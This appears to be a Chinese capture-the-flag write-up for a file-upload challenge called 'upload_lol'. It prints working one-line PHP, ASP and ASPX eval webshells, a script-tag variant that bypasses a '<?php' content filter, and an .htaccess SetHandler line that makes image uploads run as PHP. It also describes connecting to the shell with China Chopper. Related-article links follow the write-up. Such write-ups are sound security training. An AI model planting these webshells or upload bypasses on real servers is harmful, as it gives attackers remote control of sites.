题目名称:upload_lol

看到文件上传,第一个想到图片马,png试试,好像ban掉了

经过多次测试,发现.jpeg的后缀是可以上传的,但是看起来有文件代码检测,估计是检测到了<php,不只是后缀白名单。

一句话木马概述:

在很多渗透测试过程中,渗透测试人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp,php,jsp,aspc都是如此。

php木马:<?php @eval($_POST['password']);?>

asp木马:<%eval request ("password")%>

aspx木马:<%@ Page Language=“Jscript”%><%eval(Request.Item[“password”,"unsafe"])%>

直接将一句话木马插入到文件上,在代码行加入一句话木马,然后把文件上传到网站上即可

入侵条件(只要满足三个条件,即可实现成功入侵):木马上传成功,未被杀知道木马上传路径上传的木马能正常运行解析php一句话木马:<?php @eval($_POST['shallon']); ?>

密码:shallon   PHP代码要写在<? php ?>里面,服务器才能认出这是php代码,然后去解析@符号的意思是不报错,即使执行错误,也不报错密码是shallon,php里面有几个超全局变量:G E T 、 _GET、 GET、_POST就是其中之一,意思是$_POST[‘a’],用post的方法接收a这个变量evall()把字符串作为PHP代码执行

中国菜刀与一句话木马:

往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。我们可以把一句话木马插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。

打开中国菜刀,在空白处点击鼠标右键,选择“添加”选项。 编辑相关参数,包括一句话木马所在的URL及密码,最后点击“编辑。

尝试着用js写一句话木马试试

<scrpit language="php">eval($_POST['shallon']);</script>

果然成功了!访问试试,发现是以图片的形式展现出来的,.jpeg是无法用中国菜刀链接的,想到了.htaccess,可以把。让系统把png文件以php形式解析

/upload/2ccd7a39fbc84c3dd4b017d95656dbea/flag.jpeg

SetHandler application/x-httpd-php

上传完了以后直接使用中国菜刀链接getshell得到flag

2022年度“强国杯”技术技能大赛upload_lol相关推荐

  1. 2022年度“强国杯”初赛wp(有脚本,过程详细)

    首先感谢360强国杯平台和出题的各位大佬 目录 题目名称:Welcome_to_QGB 题目名称:大佬大佬 题目名称:The fn picture 题目名称:找找GIF 题目名称:B@tCh 题目名称 ...

  2. 2022年度“强国杯”选拔赛 WriteUp

    作者:Myu 时间:2022-07-17 队伍名称 Sca1pel 解题思路 Misc Welcome_to_QGB 题 题目描述: V2VsY29tZV90b19RR0I= 发现是 base64 编 ...

  3. 2022年度安徽省职业院校技能大赛中职组“网络搭建与应用”赛项竞赛试题

     2022年度安徽省职业院校技能大赛 中职组"网络搭建与应用" 赛项竞赛 (总分1000分) 竞赛说明 一.竞赛内容分布 "网络搭建与应用"竞赛共分三个部分,其 ...

  4. 工业机器人九龙坡区职教中心_2020年度机械行业职业教育技能大赛“汇博杯”精密模具智能制造综合技术应用赛项于重庆工业职业技术学院正式闭幕...

    12月24日,2020年度机械行业职业教育技能大赛"汇博杯"精密模具智能制造综合技术应用赛项在重庆工业职业技术学院正式闭幕.来自全国17所院校的25支参赛队伍参赛,赛出了水平.赛出 ...

  5. 博诺杯工业机器人比赛2019_2018年度机械行业职业教育技能大赛“博诺杯”工业机器人维修调试与技术应用竞赛顺利闭幕...

    机械工业教育发展中心副主任.全国机械职业教育教学指导委员会秘书长郑丽梅总结发言 重庆市就业局副调研员谭汉明讲话 重庆工程职业技术学院院长张进致辞 华龙网11月27日9时11分讯(许义丽)11月26日, ...

  6. 2022泰迪杯数据分析技能赛B题方案及赛后总结:银行客户忠诚度分析

    第五届"泰迪杯"数据分析技能赛(B题)『一等奖』,@队友:东可在编程.好同志歪歪 B题题目为"银行客户忠诚度分析",题目给出了短期客户产品购买数据"s ...

  7. 2022年全国职业院校技能大赛(高职组)

    2022年全国职业院校技能大赛(高职组) 目录 2022年全国职业院校技能大赛(高职组) 模块A:大数据平台搭建(容器环境)(15分) 任务一:Hadoop 完全分布式安装配置 任务二:Spark o ...

  8. 维视智造斩获2022年度光能杯最具影响力“智造”企业奖

    近日,由光伏行业权威媒体和机构--索比光伏网.索比咨询联合主办的2022年度"光能杯"影响力大奖榜单发布,维视智造凭借硬件与AI算法能力.凭借在光伏行业具有创新性的智能制造产品方案 ...

  9. 2022年全国职业院校技能大赛 网络搭建与应用赛项 公开赛卷 (十套合卷)

    2022年全国职业院校技能大赛 网络搭建与应用赛项 公开赛卷 (十套合卷) 第一部分 网络搭建及安全部署 竞赛总分 400分 竞赛时长 8小时 qq群:1169187367(改变程度解析) 2022年 ...

最新文章

  1. 记录爬取2470条数据
  2. 《程序员面试宝典》-数据结构编程练习1
  3. 机器学习笔记:向量自回归模型VAR
  4. 矩阵乘法如何去逆矩阵_矩阵乘法和求逆
  5. IE 10的新HTML​解析规则​
  6. python个人所得税怎么写分录_个人所得税的会计分录!
  7. 【免费毕设】asp.net多功能聊天软件的设计与开发(源代码+lunwen)
  8. 一步一步学FRDM-KE02Z(一):IAR调试平台搭建以及OpenSDA两种工作模式设置
  9. PageHelper测试分页插件
  10. 竟还有这样的代码注释我笑喷了
  11. 微信公众账号登陆授权开发——2
  12. 单片机复位电路是怎么工作的?
  13. 仿微博系统数据库设计和er图设计
  14. word wps 出版 常用操作
  15. php:php时区的三种设置方式
  16. 圣诞节要到了,如何制作自己的一个给头像戴帽子的小程序,请看这
  17. ch.ethz.ssh2._MindTerm SSH客户端3.4版已发布
  18. 开发杂谈:后移动互联网时代我的一些思考
  19. 2022年9月青少年软件编程(图形化)等级考试试卷--三级--数星星
  20. 弘辽科技:拼多多新店选什么推广方式?

热门文章

  1. 课工场互联网营销学院是什么?
  2. 算法系列——组合(Combinations)
  3. win10 配置 IIS PHP MySQL 环境
  4. 网络编程项目—— 多人聊天室->双人聊天
  5. 控制账户、工作包和WBS字典
  6. 100道JavaScript 面试题和答案(下)
  7. 将文件夹打包成iso
  8. Oracle 存储过程之遍历
  9. 超赞:不愧是阿里内部“Spring boot学习笔记”从头到尾,全是精华
  10. 无盘主流服务器 5,HP G5服务器与无盘的配置(证券业)